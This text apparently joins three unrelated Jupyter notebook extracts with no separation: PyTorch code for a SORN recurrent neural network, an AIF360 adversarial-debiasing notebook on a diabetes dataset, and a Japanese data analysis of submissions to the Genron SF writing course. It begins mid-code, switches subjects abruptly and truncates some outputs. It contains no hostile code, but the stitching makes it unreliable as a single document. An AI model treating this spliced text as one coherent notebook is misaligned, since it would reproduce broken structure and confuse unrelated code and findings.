def initialize_plasticity(): wee = wee_init wei = wei_init wie = wie_init te = te_init ti = ti_init x = x_init y = y_init return wee, wei, wie, te, ti, x, y @staticmethod def reorganize_network(): passMATRIX COLLECTION: Child of class SORN : All other classes store and retrieve the arrays during simulation using this class ; Literally the Memory of SORNNo need to change any steps here: Performs storage and retrieval of arrays; Use CPUs; Higher the memory of CPU, longer single simulation step can be!class MatrixCollection(Sorn): def __init__(self,phase, matrices = None): super().__init__() self.phase = phase self.matrices = matrices if self.phase == 'Plasticity' and self.matrices == None : self.time_steps = Sorn.time_steps + 1 # Total training steps self.Wee, self.Wei, self.Wie, self.Te, self.Ti, self.X, self.Y = [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps wee, wei, wie, te, ti, x, y = Plasticity.initialize_plasticity() # Assign initial matrix to the master matrices self.Wee[0] = wee self.Wei[0] = wei self.Wie[0] = wie self.Te[0] = te self.Ti[0] = ti self.X[0] = x self.Y[0] = y elif self.phase == 'Plasticity' and self.matrices != None: self.time_steps = Sorn.time_steps + 1 # Total training steps self.Wee, self.Wei, self.Wie, self.Te, self.Ti, self.X, self.Y = [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps # Assign matrices from plasticity phase to the new master matrices for training phase self.Wee[0] = matrices['Wee'] self.Wei[0] = matrices['Wei'] self.Wie[0] = matrices['Wie'] self.Te[0] = matrices['Te'] self.Ti[0] = matrices['Ti'] self.X[0] = matrices['X'] self.Y[0] = matrices['Y'] elif self.phase == 'Training': """NOTE: time_steps here is diferent for plasticity or trianing phase""" self.time_steps = Sorn.time_steps + 1 # Total training steps self.Wee, self.Wei, self.Wie, self.Te, self.Ti, self.X, self.Y = [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps # Assign matrices from plasticity phase to new respective matrices for training phase self.Wee[0] = matrices['Wee'] self.Wei[0] = matrices['Wei'] self.Wie[0] = matrices['Wie'] self.Te[0] = matrices['Te'] self.Ti[0] = matrices['Ti'] self.X[0] = matrices['X'] self.Y[0] = matrices['Y'] # @staticmethod def weight_matrix(self, wee, wei, wie, i): # Get delta_weight from Plasticity.stdp # i - training step self.Wee[i + 1] = wee self.Wei[i + 1] = wei self.Wie[i + 1] = wie return self.Wee, self.Wei, self.Wie # @staticmethod def threshold_matrix(self, te, ti, i): self.Te[i + 1] = te self.Ti[i + 1] = ti return self.Te, self.Ti # @staticmethod def network_activity_t(self, excitatory_net, inhibitory_net, i): self.X[i + 1] = excitatory_net self.Y[i + 1] = inhibitory_net return self.X, self.Y # @staticmethod def network_activity_t_1(self, x, y, i): x_1, y_1 = [0] * self.time_steps, [0] * self.time_steps x_1[i] = x y_1[i] = y return x_1, y_1NETWORK STATE: Class which measure the evolution of network state with and without external stimuli. Also reveals recurrent activity in the network. Compute using GPU!class NetworkState(Plasticity): """The evolution of network states""" def __init__(self, v_t): super().__init__() self.v_t = v_t def incoming_drive(self,weights,activity_vector): # Broadcasting weight*acivity vectors if weights.shape[0] == weights.shape[1]: incoming = torch.mm(weights.cuda(), activity_vector.cuda()) else: incoming = torch.mm(weights.t().cuda(), activity_vector.cuda()) incoming = incoming.sum(dim=0).cuda() return incoming def excitatory_network_state(self, wee, wei, te, x, y,white_noise_e): """ Activity of Excitatory neurons in the network""" xt = x[:, 1].unsqueeze(1) yt = y[:, 1].unsqueeze(1) incoming_drive_e = self.incoming_drive(weights = wee,activity_vector=xt).cuda() incoming_drive_i = self.incoming_drive(weights = wei,activity_vector=yt).cuda() # tot_incoming_drive = incoming_drive_e.add_(torch.randn(incoming_drive_e.size()) * 0.04) - incoming_drive_i - te tot_incoming_drive = incoming_drive_e - incoming_drive_i - te.cuda() """Heaviside step function""" heaviside_step = torch.zeros(len(tot_incoming_drive)) for t in range(len(tot_incoming_drive)): heaviside_step[t] = torch.Tensor([0.0]).cuda() if tot_incoming_drive[t].cuda() < te[t].cuda() else torch.Tensor([1.0]).cuda() xt_next = heaviside_step.unsqueeze(1).cuda() return xt_next def inhibitory_network_state(self, wie, ti, x,white_noise_i): # Activity of inhibitory neurons xt = x[:, 1].unsqueeze(1) incoming_drive_i = self.incoming_drive(weights = wie,activity_vector=xt).cuda() # tot_incoming_drive = incoming_drive_i.add_(torch.randn(incoming_drive_e.size()) * 0.04) - ti tot_incoming_drive = incoming_drive_i - ti.cuda() """Implement Heaviside step function""" heaviside_step = torch.zeros(len(tot_incoming_drive)) for t in range(len(tot_incoming_drive)): heaviside_step[t] = torch.Tensor([0.0]).cuda() if tot_incoming_drive[t].cuda() < ti[t].cuda() else torch.Tensor([1.0]).cuda() yt_next = heaviside_step.unsqueeze(1).cuda() return yt_next def recurrent_drive(self, wee, wei, te, x, y,white_noise_e): """Network state due to recurrent drive received by the each unit at time t+1""" xt = x[:, 1].unsqueeze(1) yt = y[:, 1].unsqueeze(1) incoming_drive_e = self.incoming_drive(weights = wee,activity_vector=xt).cuda() incoming_drive_i = self.incoming_drive(weights = wei,activity_vector=yt).cuda() # tot_incoming_drive = incoming_drive_e.add_(torch.randn(incoming_drive_e.size()) * 0.04) - incoming_drive_i - te tot_incoming_drive = incoming_drive_e - incoming_drive_i - te.cuda() """Heaviside step function""" heaviside_step = torch.zeros(len(tot_incoming_drive)).cuda() for t in range(len(tot_incoming_drive)): heaviside_step[t] = torch.Tensor([0.0]).cuda() if tot_incoming_drive[t].cuda() < te[t].cuda() else torch.Tensor([1.0]).cuda() xt_next = heaviside_step.unsqueeze(1).cuda() return xt_next class RunSorn(Sorn): def __init__(self,phase,matrices,time_steps): super().__init__() self.time_steps = time_steps Sorn.time_steps = time_steps self.phase = phase self.matrices = matrices def run_sorn(self, inp): # Initialize/Get the weight, threshold matrices and activity vectors matrix_collection = MatrixCollection(phase = self.phase,matrices = self.matrices) # Collect the network activity at all time steps x_all = [] Y_all = [] R_all = [] frac_pos_active_conn = [] # To get the last activation status of Exc and Inh neurons for i in tqdm.tqdm(range(self.time_steps)): # """ Generate white noise""" # white_noise_e = white_gaussian_noise(mu= 0., sigma = 0.04,t = Sorn.ne) # white_noise_i = white_gaussian_noise(mu= 0., sigma = 0.04,t = Sorn.ni) network_state = NetworkState(inp) # Feed input and initialize network state # Buffers to get the resulting x and y vectors at the current time step and update the master matrix x_buffer, y_buffer = torch.zeros(( Sorn.ne, 2)), torch.zeros((Sorn.ni, 2)).cuda() te_buffer, ti_buffer = torch.zeros((Sorn.ne, 1)), torch.zeros((Sorn.ni, 1)).cuda() # Get the matrices and rename them for ease of reading Wee, Wei, Wie = matrix_collection.Wee, matrix_collection.Wei, matrix_collection.Wie Te, Ti = matrix_collection.Te, matrix_collection.Ti X, Y = matrix_collection.X, matrix_collection.Y # Recurrent drive at t+1 used to predict the next external stimuli r = network_state.recurrent_drive(Wee[i], Wei[i], Te[i], X[i], Y[i],white_noise_e=0.).cuda() """ Fraction of active connections between E-E network""" frac_pos_active_conn.append((Wee[i] > 0.0).sum()) """Get excitatory states and inhibitory states given the weights and thresholds""" # x(t+1), y(t+1) excitatory_state_xt_buffer = network_state.excitatory_network_state(Wee[i], Wei[i], Te[i], X[i], Y[i],white_noise_e=0.).cuda() inhibitory_state_yt_buffer = network_state.inhibitory_network_state(Wie[i], Ti[i], X[i],white_noise_i=0.) """ Update X and Y """ x_buffer[:, 0] = X[i][:, 1] # xt -->(becomes) xt_1 x_buffer[:, 1] = excitatory_state_xt_buffer.squeeze() # New_activation; x_buffer --> xt y_buffer[:, 0] = Y[i][:, 1] y_buffer[:, 1] = inhibitory_state_yt_buffer.squeeze() """Plasticity phase""" plasticity = Plasticity() # STDP Wee_t = plasticity.stdp(Wee[i],x_buffer,cutoff_weights = (0.0,1.0)).cuda() # Intrinsic plasticity Te_t = plasticity.ip(Te[i],x_buffer) # Structural plasticity # Wee_t = plasticity.structural_plasticity(Wee_t) # iSTDP # Wei_t = plasticity.istdp(Wei[i],x_buffer,y_buffer,cutoff_weights = (0.0,1.0)) # Synaptic scaling Wee Wee_t = Plasticity().ss(Wee_t) # Synaptic scaling Wei # Wei_t = Plasticity().ss(Wei_t) """Assign the matrices to the matrix collections""" matrix_collection.weight_matrix(Wee_t, Wei[i], Wie[i], i) matrix_collection.threshold_matrix(Te_t, Ti[i], i) matrix_collection.network_activity_t(x_buffer, y_buffer, i) x_all.append(x_buffer[:,1]) Y_all.append(y_buffer[:,1]) R_all.append(r) plastic_matrices = {'Wee':matrix_collection.Wee[-1], 'Wei': matrix_collection.Wei[-1], 'Wie':matrix_collection.Wie[-1], 'Te': matrix_collection.Te[-1], 'Ti': matrix_collection.Ti[-1], 'X': X[-1], 'Y': Y[-1]} return plastic_matrices,x_all,Y_all,R_all,frac_pos_active_conn plastic_matrices,X_all,Y_all,R_all,frac_pos_active_conn = RunSorn(phase = 'Plasticity',matrices = None,time_steps = 10).run_sorn(None)0%| | 0/10 [00:00This Notebook demonstrates how to reduce the bias during "Pre-processing" & "In-processing" stage using AI 360 Fairness toolkit Pre-processing algorithmA bias mitigation algorithm that is applied to training data. In-processing algorithmA bias mitigation algorithm that is applied to a model during its training. Insert your credentials as credentials in the below cellClick on dropdown from Pipeline_LabelEncoder-0.1.zip under Data tab and select 'Credentials'# @hidden_cell # The following code contains the credentials for a file in your IBM Cloud Object Storage. # You might want to remove those credentials before you share your notebook. credentials = { } from ibm_botocore.client import Config import ibm_boto3 cos = ibm_boto3.client(service_name='s3', ibm_api_key_id=credentials['IBM_API_KEY_ID'], ibm_service_instance_id=credentials['IAM_SERVICE_ID'], ibm_auth_endpoint=credentials['IBM_AUTH_ENDPOINT'], config=Config(signature_version='oauth'), endpoint_url=credentials['ENDPOINT']) import os os.getcwd() cos.download_file(Bucket=credentials['BUCKET'],Key='Pipeline_LabelEncoder-0.1.zip',Filename='/home/wsuser/work/Pipeline_LabelEncoder-0.1.zip') !ls !pip install Pipeline_LabelEncoder-0.1.zip !pip install aif360 !pip install 'tensorflow>=1.13.1,< 2' --force-reinstall import tensorflow as tf tf.__version__ %matplotlib inline # Load all necessary packages import pandas as pd from aif360.datasets import BinaryLabelDataset from aif360.metrics import BinaryLabelDatasetMetric from aif360.metrics import ClassificationMetric from aif360.metrics.utils import compute_boolean_conditioning_vector from aif360.algorithms.inprocessing.adversarial_debiasing import AdversarialDebiasing from sklearn.linear_model import LogisticRegression from sklearn.preprocessing import StandardScaler, MaxAbsScaler from sklearn.metrics import accuracy_score from IPython.display import Markdown, display import matplotlib.pyplot as plt df = pd.read_csv(body) df.head() df.describe(include = 'all') privileged_groups = [{'Age': 1}] unprivileged_groups = [{'Age': 0}] favorable_label = 0 unfavorable_label = 1 from sklearn import preprocessing categorical_column = ['Age'] data_encoded = df.copy(deep=True) #Use Scikit-learn label encoding to encode character data lab_enc = preprocessing.LabelEncoder() for col in categorical_column: data_encoded[col] = lab_enc.fit_transform(df[col]) le_name_mapping = dict(zip(lab_enc.classes_, lab_enc.transform(lab_enc.classes_))) print('Feature', col) print('mapping', le_name_mapping) data_encoded.head() from Pipeline_LabelEncoder.sklearn_label_encoder import PipelineLabelEncoder preprocessed_data = PipelineLabelEncoder(columns = ['Age']).fit_transform(data_encoded) print('-------------------------') #print('validation data encoding') #validation_enc_data = PipelineLabelEncoder(columns = ['Gender','Married', 'Fraud_risk']).transform(validation_input_data) #Create binary label dataset that can be used by bias mitigation algorithms diabetes_dataset = BinaryLabelDataset(favorable_label=favorable_label, unfavorable_label=unfavorable_label, df=preprocessed_data, label_names=['Outcome'], protected_attribute_names=['Age'], unprivileged_protected_attributes=unprivileged_groups) display(Markdown("#### Training Data Details")) print("shape of the training dataset", diabetes_dataset.features.shape) print("Training data favorable label", diabetes_dataset.favorable_label) print("Training data unfavorable label", diabetes_dataset.unfavorable_label) print("Training data protected attribute", diabetes_dataset.protected_attribute_names) print("Training data privileged protected attribute (1:Young and 0:Old)", diabetes_dataset.privileged_protected_attributes) print("Training data unprivileged protected attribute (1:Young and 0:Old)", diabetes_dataset.unprivileged_protected_attributes) diabetes_dataset_train, diabetes_dataset_test = diabetes_dataset.split([0.6], shuffle=True) # Metric for the original dataset metric_orig_train = BinaryLabelDatasetMetric(diabetes_dataset_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) display(Markdown("#### Original training dataset")) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_train.mean_difference()) metric_orig_test = BinaryLabelDatasetMetric(diabetes_dataset_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_test.mean_difference()) min_max_scaler = MaxAbsScaler() diabetes_dataset_train.features = min_max_scaler.fit_transform(diabetes_dataset_train.features) diabetes_dataset_test.features = min_max_scaler.transform(diabetes_dataset_test.features) metric_scaled_train = BinaryLabelDatasetMetric(diabetes_dataset_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) display(Markdown("#### Scaled dataset - Verify that the scaling does not affect the group label statistics")) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_scaled_train.mean_difference()) metric_scaled_test = BinaryLabelDatasetMetric(diabetes_dataset_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_scaled_test.mean_difference())Build plan classifier without debiasing# Load post-processing algorithm that equalizes the odds # Learn parameters with debias set to False sess = tf.Session() #sess = tf.compat.v1.Session() plain_model = AdversarialDebiasing(privileged_groups = privileged_groups, unprivileged_groups = unprivileged_groups, scope_name='plain_classifier', debias=False, sess=sess) plain_model.fit(diabetes_dataset_train)WARNING:tensorflow:From /opt/conda/envs/Python-3.7-main/lib/python3.7/site-packages/aif360/algorithms/inprocessing/adversarial_debiasing.py:137: The name tf.variable_scope is deprecated. Please use tf.compat.v1.variable_scope instead. WARNING:tensorflow:From /opt/conda/envs/Python-3.7-main/lib/python3.7/site-packages/aif360/algorithms/inprocessing/adversarial_debiasing.py:141: The name tf.placeholder is deprecated. Please use tf.compat.v1.placeholder instead. WARNING:tensorflow:From /opt/conda/envs/Python-3.7-main/lib/python3.7/site-packages/aif360/algorithms/inprocessing/adversarial_debiasing.py:84: The name tf.get_variable is deprecated. Please use tf.compat.v1.get_variable instead. WARNING:tensorflow: The TensorFlow contrib module will not be included in TensorFlow 2.0. For more information, please see: * https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md * https://github.com/tensorflow/addons * https://github.com/tensorflow/io (for I/O rela[...]Apply the plain model to test datadataset_nodebiasing_train = plain_model.predict(diabetes_dataset_train) dataset_nodebiasing_test = plain_model.predict(diabetes_dataset_test)Metrics for the dataset from plain model (without debiasing)display(Markdown("#### Model - without debiasing - dataset metrics")) metric_dataset_nodebiasing_train = BinaryLabelDatasetMetric(dataset_nodebiasing_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_train.mean_difference()) metric_dataset_nodebiasing_test = BinaryLabelDatasetMetric(dataset_nodebiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_test.mean_difference()) display(Markdown("#### Model - without debiasing - classification metrics")) classified_metric_nodebiasing_test = ClassificationMetric(diabetes_dataset_test, dataset_nodebiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Classification accuracy = %f" % classified_metric_nodebiasing_test.accuracy()) TPR = classified_metric_nodebiasing_test.true_positive_rate() TNR = classified_metric_nodebiasing_test.true_negative_rate() bal_acc_nodebiasing_test = 0.5*(TPR+TNR) print("Test set: Balanced classification accuracy = %f" % bal_acc_nodebiasing_test) print("Test set: Disparate impact = %f" % classified_metric_nodebiasing_test.disparate_impact()) print("Test set: Equal opportunity difference = %f" % classified_metric_nodebiasing_test.equal_opportunity_difference()) print("Test set: Average odds difference = %f" % classified_metric_nodebiasing_test.average_odds_difference()) print("Test set: Theil_index = %f" % classified_metric_nodebiasing_test.theil_index())Apply in-processing algorithm based on adversarial learningsess.close() tf.reset_default_graph() sess = tf.Session() # Learn parameters with debias set to True debiased_model = AdversarialDebiasing(privileged_groups = privileged_groups, unprivileged_groups = unprivileged_groups, scope_name='debiased_classifier', debias=True, sess=sess) debiased_model.fit(diabetes_dataset_train)epoch 0; iter: 0; batch classifier loss: 0.719709; batch adversarial loss: 0.707410 epoch 1; iter: 0; batch classifier loss: 0.734156; batch adversarial loss: 0.704542 epoch 2; iter: 0; batch classifier loss: 0.726808; batch adversarial loss: 0.702275 epoch 3; iter: 0; batch classifier loss: 0.745609; batch adversarial loss: 0.701177 epoch 4; iter: 0; batch classifier loss: 0.731937; batch adversarial loss: 0.700088 epoch 5; iter: 0; batch classifier loss: 0.724922; batch adversarial loss: 0.698732 epoch 6; iter: 0; batch classifier loss: 0.713914; batch adversarial loss: 0.695718 epoch 7; iter: 0; batch classifier loss: 0.721002; batch adversarial loss: 0.695420 epoch 8; iter: 0; batch classifier loss: 0.706691; batch adversarial loss: 0.692693 epoch 9; iter: 0; batch classifier loss: 0.704806; batch adversarial loss: 0.690888 epoch 10; iter: 0; batch classifier loss: 0.713283; batch adversarial loss: 0.687029 epoch 11; iter: 0; batch classifier loss: 0.709272; batch adversarial loss:[...]Apply the plain model to test datadataset_debiasing_train = debiased_model.predict(diabetes_dataset_train) dataset_debiasing_test = debiased_model.predict(diabetes_dataset_test) # Metrics for the dataset from plain model (without debiasing) display(Markdown("#### Model - without debiasing - dataset metrics")) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_train.mean_difference()) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_test.mean_difference()) # Metrics for the dataset from model with debiasing display(Markdown("#### Model - with debiasing - dataset metrics")) metric_dataset_debiasing_train = BinaryLabelDatasetMetric(dataset_debiasing_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_debiasing_train.mean_difference()) metric_dataset_debiasing_test = BinaryLabelDatasetMetric(dataset_debiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_debiasing_test.mean_difference()) display(Markdown("#### Model - without debiasing - classification metrics")) print("Test set: Classification accuracy = %f" % classified_metric_nodebiasing_test.accuracy()) TPR = classified_metric_nodebiasing_test.true_positive_rate() TNR = classified_metric_nodebiasing_test.true_negative_rate() bal_acc_nodebiasing_test = 0.5*(TPR+TNR) print("Test set: Balanced classification accuracy = %f" % bal_acc_nodebiasing_test) print("Test set: Disparate impact = %f" % classified_metric_nodebiasing_test.disparate_impact()) print("Test set: Equal opportunity difference = %f" % classified_metric_nodebiasing_test.equal_opportunity_difference()) print("Test set: Average odds difference = %f" % classified_metric_nodebiasing_test.average_odds_difference()) print("Test set: Theil_index = %f" % classified_metric_nodebiasing_test.theil_index()) display(Markdown("#### Model - with debiasing - classification metrics")) classified_metric_debiasing_test = ClassificationMetric(diabetes_dataset_test, dataset_debiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Classification accuracy = %f" % classified_metric_debiasing_test.accuracy()) TPR = classified_metric_debiasing_test.true_positive_rate() TNR = classified_metric_debiasing_test.true_negative_rate() bal_acc_debiasing_test = 0.5*(TPR+TNR) print("Test set: Balanced classification accuracy = %f" % bal_acc_debiasing_test) print("Test set: Disparate impact = %f" % classified_metric_debiasing_test.disparate_impact()) print("Test set: Equal opportunity difference = %f" % classified_metric_debiasing_test.equal_opportunity_difference()) print("Test set: Average odds difference = %f" % classified_metric_debiasing_test.average_odds_difference()) print("Test set: Theil_index = %f" % classified_metric_debiasing_test.theil_index())データで見る ゲンロン 大森望 SF創作講座 2018 [ゲンロン 大森望 SF創作講座 第3期](http://school.genron.co.jp/works/sf/2018/) も残すところ最終課題のみとなった。 最終課題は「ゲンロンSF新人賞」と題されており他とは少し毛色が違うので、通常課題はすべて出揃ったことになる。 明日からは[第4期の募集も始まる](https://twitter.com/genronschool/status/1110500492763762688)とのことなので、受講を迷っている方に向けてSF創作講座第3期のデータを見てみようと思う。目次は次のとおりである。- 課題提出数の推移- 選出・得点の機会- 梗概の文字数- 受講生勝手にランキング データは、[fuji-nakahara/genron-sf-app](https://github.com/fuji-nakahara/genron-sf-app) を用いて [超・SF作家育成サイト](http://school.genron.co.jp/works/sf/) をスクレイピングしたものを用いる。import pandas as pd import seaborn as sns %config InlineBackend.figure_formats = {'png', 'retina'} sns.set() %config SqlMagic.autopandas = True %config SqlMagic.feedback = False %load_ext sql %sql postgresql://fuji-nakahara@localhost/genron-school-sf-app_development term_id = 2018 from datetime import datetime print(datetime.now())2019-03-29 01:39:09.829794課題提出数の推移 まずは、課題ごとに何編の梗概・実作が提出されているかをみてみよう。SF創作講座は1年の期間を通して月に1度のペースで開催される。 受講料は20万円と決して安くはないが、途中から課題を提出しなくなる受講生も意外と多い。 かくいう私自身も第8回の梗概を最後に、最終課題は提出できなさそうである。 提出数の推移から、そういった受講生がどのくらいるかがわかるだろう。%%sql subjects << select s.number , s.title , l.name as proposer , s.synopses_count , count(sy.id) as selected_synopses_count , s.works_count from subjects s left join lecturers l on (s.id = l.subject_id and ('課題提示' = any (l.roles))) left join synopses sy on (s.id = sy.subject_id and sy.selected = True) where s.term_id = :term_id and s.number <= 10 group by 1, 2, 3, 4, 6 order by 1 subjects上の表は、各課題の梗概提出数 (synopses_count) と実作提出数 (works_count) である。合わせて、選出された梗概の数 (selected_synopses_count) も出している。 梗概の選出は各課題原則3編とのことだったが、3期は4編選ばれることのほうが多かった。梗概と実作の提出数の推移をグラフにすると次のようになる。subjects.plot(x='number', y=['synopses_count', 'works_count'])梗概数は回を増すごとに単調に減少している。 第1回は43編が提出されていたが、第9・10回は約半数の22編である。 11月(第6回)に聴講生から受講生に変わった人が3名ほどいるため、実質半数を切っている。実作提出数は増えたり減ったりであるが、やはり序盤の方が少し多い。 ちなみに、梗概・実作の提出総数は次のとおりである。subjects[['synopses_count', 'works_count']].sum()選出・得点機会 脱落してしまう理由はいろいろあると思うが、一つに徹底した実力主義があるだろう。 提出した梗概は審査され、全提出作から3または4編だけが選出される。 そして、選出されたとしても、また次回に実作で点数を競うことになる。講義の時間は選出作品に多く割かれ、講師の評価が低ければほとんど言及されないことも珍しくない。 仮に競争を意識していなかったとしても、提出した作品が講義で取り上げられないことが続くとつらいものがある。この節では、そうした梗概の選出・実作の得点機会についてみる。%%sql student_synopses << select name , submitted_count , selected_count , coalesce(characters_sum / submitted_count::real, 0) as characters_ave , coalesce(max_character_count, 0) as max_character_count , coalesce(appeal_characters_sum / submitted_count::real, 0) as appeal_characters_ave , coalesce(max_appeal_character_count, 0) as max_appeal_character_count from ( select s.original_id , s.name , count(sy.id) as submitted_count , sum(case when sy.selected then 1 else 0 end) as selected_count , sum(sy.character_count) as characters_sum , max(sy.character_count) as max_character_count , sum(sy.appeal_character_count) as appeal_characters_sum , max(sy.appeal_character_count) as max_appeal_character_count from students s join students_terms st on s.id = st.student_id left join ( select sy.* from synopses sy join subjects su on ( sy.subject_id = su.id and su.term_id = :term_id ) ) sy on s.id = sy.student_id where st.term_id = :term_id group by 1, 2 ) student_synopses order by original_id %%sql student_works << select name , submitted_count , submitted_count - selected_count as optional_count , coalesce(score, 0) as score , optional_score , coalesce(characters_sum, 0) as characters_sum from ( select s.original_id , s.name , count(w.id) as submitted_count , sum(case when w.selected = True then 1 else 0 end) as selected_count , sum(w.score) as score , sum(case when w.selected != True then w.score else 0 end) as optional_score , sum(w.character_count) as characters_sum from students s join students_terms st on s.id = st.student_id left join ( select w.* , sy.selected from works w join subjects su on ( w.subject_id = su.id and su.term_id = :term_id ) left join synopses sy using (original_id) ) w on s.id = w.student_id where st.term_id = :term_id group by 1, 2 ) student_synopses order by original_id* postgresql://fuji-nakahara@localhost/genron-school-sf-app_development Returning data to local variable student_works梗概の提出・選出回数 受講生1人あたりの梗概提出回数・選出回数を調べてみよう。student_synopses[['submitted_count', 'selected_count']].describe()48人の受講生について、梗概提出回数 (submitted_count) の平均値は5.87回、中央値は6回である。 それに対し、選出回数 (selected_count) は平均0.69回、中央値に至っては0回であった。 つまり、半数以上の受講生が一度も選出されないのである。 分布にすると次のようになる。student_synopses[['submitted_count', 'selected_count']].plot.hist(bins=11, alpha=0.5)オレンジ色が選出回数の分布である。 1度も選出されていない受講生が32人おり、これは全体の32/48、すなわち3分の2である。 また、青色が提出回数の分布である。 これを見ると、10回、つまりすべての課題の梗概を提出した受講生が13人ほどいる。 実作提出数・自主提出数 同じように実作についてもみてみよう。基本的には、梗概を選出された受講生が次の回に実作を書くことになっている。 しかし、選出されていなくても実作を提出することは許されており、これは自主提出と呼ばれている。 自主提出の場合は、必ずしも点数がつくわけではない。student_works[['submitted_count', 'optional_count']].describe()実作提出回数の平均は1.92回、自主提出回数の平均は1.31回だった。 提出回数の分布は次のようになる。student_works.submitted_count.plot.hist(bins=10)48人中26人、すなわち半数以上は1度も実作を提出していない。 また、自主提出作品の総数は次のとおりである。student_works.optional_count.sum()得点した自主提出作品 自主提出にはどのくらいの点数がつくのか。 得点した自主提出作品はそれほど多くないので、すべてリストアップしてみよう。%%sql select su.number , su.title as subject_title , w.title as work_title , s.name as author , w.score from works w join students s on w.student_id = s.id join subjects su on ( w.subject_id = su.id and su.term_id = :term_id ) join synopses sy on (w.original_id = sy.original_id) where sy.selected != True and w.score > 0 order by 1, s.original_id* postgresql://fuji-nakahara@localhost/genron-school-sf-app_development自主提出63作中得点したのはたった14作である。 14/63 = 0.22 ということで、4分の1未満の自主提出作品にしか点数はつかない。 また、得点の最大値も5点となっている。 梗概の文字数 この節では、梗概の文字数についてみていく。SF創作講座の課題には、梗概1200字以下、アピール文400字以下というルールがある。 しかし、これはほとんど守られていない。 そして、守っていない作品も選出される。 むしろ、守っていない作品のほうが選出されやすいのではないか? 多くの受講生が疑問思っているであろうこの問いに答えてみたい。%%sql synopses_character_counts << select s.number , sy.title , st.name as author , sy.character_count , sy.appeal_character_count , sy.selected from subjects s join synopses sy on s.id = sy.subject_id join students st on sy.student_id = st.id where s.term_id = :term_id and s.number <= 9 order by 1 selected_synopses_character_counts = synopses_character_counts[synopses_character_counts.selected]各種文字数の統計量 全梗概の文字数、全梗概のアピール文文字数、選出梗概の文字数、選出梗概のアピール文文字数のそれぞれについて平均や分散などの統計量をみる。character_counts_with_selected = pd.DataFrame( { 'character_count': synopses_character_counts.character_count, 'selected_character_count': selected_synopses_character_counts.character_count, 'appeal_character_count': synopses_character_counts.appeal_character_count.fillna(0), 'selected_appeal_character_count': selected_synopses_character_counts.appeal_character_count.fillna(0) } ) character_counts_with_selected.describe()梗概の文字数 (character_count) の平均は1434字であるのに対し、選出梗概の文字数 (selected_character_count) の平均は1581字と約150字も多かった。 アピール文についても、329字に対し、341字と10字ほど多い。 もちろん、選出梗概のサンプル数が少なく、標準偏差も大きいため有意差はない。 とはいえ、選出梗概の方が文字数が多いのではないか、という感覚が間違いではなさそうだ。本文文字数の25パーセンタイルを見ると、1197字(選出梗概で1198字)となっており、約1/4の作品しか本文の文字数制約を守っていないことがわかる。また、アピール文に関しては75パーセンタイルが400字ということで、約3/4がルールを守っている。 本文とアピール文の文字数の分布はそれぞれ次のようになる。bins = list(range(0, character_counts_with_selected.character_count.max() + 300, 300)) character_counts_with_selected[['character_count', 'selected_character_count']].plot.hist(bins=bins) bins = list(range(0, int(character_counts_with_selected.appeal_character_count.max()) + 100, 100)) character_counts_with_selected[['appeal_character_count', 'selected_appeal_character_count']].plot.hist(bins=bins)文字数順の選出梗概 選出梗概はそもそも33編しかないので、一覧しても大した量ではない。 せっかくなので、本文文字数の少ない順に並べておく。selected_synopses_character_counts.sort_values(by='character_count')課題ごとの梗概文字数 次に、課題ごとの梗概文字数の分布を見ておこう。 もしかすると、1200字のルールを守ったものしか選出しないゲスト講師がいるかも知れない。sns.scatterplot(x='number', y='character_count', hue='selected', data=synopses_character_counts)横軸が課題の番号、縦軸が文字数で、ひとつひとつの作品がドットでプロットされている。 選出された梗概はドットがオレンジ色になっている。ただ、これではドットの重なりが多くわかりにくいので、重なった部分を横に広げたのが下の図である。sns.swarmplot(x='number', y='character_count', hue='selected', data=synopses_character_counts)すべての選出作が1200字を下回ったのは第1回だけだった。 受講生勝手にランキング ここからは趣向を変えて、3期のようすを知っている人向けのデータを紹介する。 SF創作講座では得点が絶対唯一の指標であるが、ここではそれ以外の数値について受講生を勝手にランキングしていこうと思う。 梗概 まずは、梗概に関するランキングである。 データとして以下の表を用いる。student_synopses梗概提出皆勤賞 全10回すべての梗概を提出した13名は次のとおりである。student_synopses[student_synopses.submitted_count == 10][['name', 'submitted_count']]文字数遵守 10回すべての梗概を提出しながらも、梗概とアピール文の文字数制限をすべて守った受講生が、なんと一人だけいた。 揚羽はなさんである。ちなみに梗概を4回以上提出した人に範囲を広げてもただ1人である。student_synopses \ [(student_synopses.max_character_count <= 1200) & (student_synopses.submitted_count >= 4)] \ [['name', 'submitted_count', 'max_character_count']] \ .sort_values(by='max_character_count').head()5回以上の提出で平均文字数1200字以下 毎回守ったわけではないが、過半数の課題を提出したうえで、それらの文字数を平均すると1200字以下になる受講生は次のとおりである。student_synopses \ 